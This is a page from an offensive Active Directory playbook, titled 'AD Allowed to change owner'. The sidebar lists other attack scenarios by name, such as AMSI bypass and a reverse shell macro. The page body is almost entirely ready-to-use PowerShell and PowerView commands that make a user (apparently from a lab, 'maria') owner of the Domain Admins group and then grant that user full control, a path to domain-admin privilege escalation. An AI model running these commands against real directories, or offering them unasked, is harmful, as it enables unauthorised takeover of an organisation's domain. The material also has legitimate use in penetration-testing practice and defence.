🏴‍☠️
PlayBook
  • 🎄Active Directory Checklist
  • 👩‍✈️Active Directory Commands
  • ⛓️Scenarios
    • Allowed To Delegate
    • Ansible Vault found
    • You have found an Azure sync sql server and have access
    • Backup Operator SeBackupPrivilege dump ntds.dit
    • Bypass AMSI
    • Certificate Authority create certificate request
    • Certificate Authority Vulnerable Cert
    • Certificate Found
    • Check connectivity with ping
    • Debug Python
    • Decode Strings
    • Defender Outbound Connection
    • Defender remove definitions
    • Deleted AD Object
    • Deserialization Payloads
    • dig enumeration
    • DnsAdmin PrivEsc
    • DomainDump analysys
    • Files found
    • Evil Winrm Kerberos
    • Find ipv6 Ipv6 Port Scanning
    • Find Write to Share NTLM Theft
    • Force auth back to yourself
    • Forward from host Enable Ip Forwarding Kali
    • GPP Groups.xml
    • Grep email from complex content
    • Icacls protect binary from system
    • install dacledit.py
    • Invoke WebRequest vhost
    • Jenkins Found
    • Kerberos Auth required
    • Overview
    • Get Laps passwords
    • ldapmodify to update AD
    • LibreOffice Reverse Shell macro
    • lsass.dmp
    • Offline Sam dump
    • Powershell Oneliners
    • Port 135 MSRPC
    • RBCD GenericAll Computer
    • ReadGSMAPassword
    • Reset password with mimikatz
    • Shadow Credentials
    • Sign Powershell script
    • SMTP Server Found
    • SOCAT to redirect ports
    • System on DC TGT Delegation
    • Take ownership of files and set permissions
    • TightVnc Registry Password
    • WinRM requires ssl
    • WriteDACL Rights
    • AD Allowed to change owner
    • Add AD DNS entry Scripted Outbound Connection Found
Powered by GitBook
On this page
  • Display owner with PowerShell
  • Set owner
  • Set Full rights
  1. Scenarios

AD Allowed to change owner

If you are allowed to change the owner on an object you are in a good place because owners have the right to update ACL. So you can set full control on a object.

Display owner with PowerShell

For bulk operations, it is therefore recommended to use PowerShell. If you first want to get an overview of multiple objects' ownership, there are several options available.

One approach is to generate a list of computer names and owners by expanding the nTSecurityDescriptor attribute using Select-Object:

Get-ADGroup -Filter * -properties ntSecurityDescriptor -PipelineVariable p | select -ExpandProperty ntSecurityDescriptor | select @{n="Computer";e={ $p.name }}, @{n="Owner";e={ $_.owner }}

Set owner

# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
# Powerview.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'

Set Full rights

# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$ace = New-Object Security.AccessControl.ActiveDirectoryAccessRule('object.local\Domain Admins','FullControl');$acl.AddAccessRule($ace);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

#Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
PreviousWriteDACL RightsNextAdd AD DNS entry Scripted Outbound Connection Found
⛓️